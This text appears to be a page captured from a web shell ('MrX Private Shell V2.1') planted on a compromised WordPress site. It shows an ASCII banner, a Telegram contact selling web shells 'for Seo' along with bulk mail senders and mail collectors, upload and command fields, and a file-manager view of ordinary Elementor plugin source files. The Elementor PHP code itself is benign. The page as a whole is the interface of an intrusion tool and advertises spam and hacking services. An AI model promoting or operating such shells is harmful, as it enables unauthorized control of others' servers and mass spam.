__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php

namespace Elementor\Modules\AtomicWidgets\Styles;

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly.
}

class Style_File {
	private string $handle;
	private string $path;
	private string $url;
	private string $media;

	private function __construct( string $handle, string $path, string $url, string $media ) {
		$this->handle = $handle;
		$this->path = $path;
		$this->url = $url;
		$this->media = $media;
	}

	public static function create( string $handle, string $path, string $url, string $media ): self {
		return new self( $handle, $path, $url, $media );
	}

	public function get_handle(): string {
		return $this->handle;
	}

	public function get_path(): string {
		return $this->path;
	}

	public function get_url(): string {
		return $this->url;
	}

	public function get_media(): string {
		if ( str_starts_with( $this->media, '@media' ) ) {
			return substr( $this->media, 6 );
		}

		return $this->media;
	}
}

Filemanager

Name Type Size Permission Actions
atomic-styles-manager.php File 7.26 KB 0664
atomic-widget-base-styles.php File 1.21 KB 0664
atomic-widget-styles.php File 2.66 KB 0664
css-files-manager.php File 2.41 KB 0664
size-constants.php File 2.72 KB 0664
style-definition.php File 759 B 0664
style-file.php File 946 B 0664
style-fonts.php File 1.16 KB 0664
style-schema.php File 14.04 KB 0664
style-states.php File 1.13 KB 0664
style-variant.php File 898 B 0664
styles-renderer.php File 5.26 KB 0664
Filemanager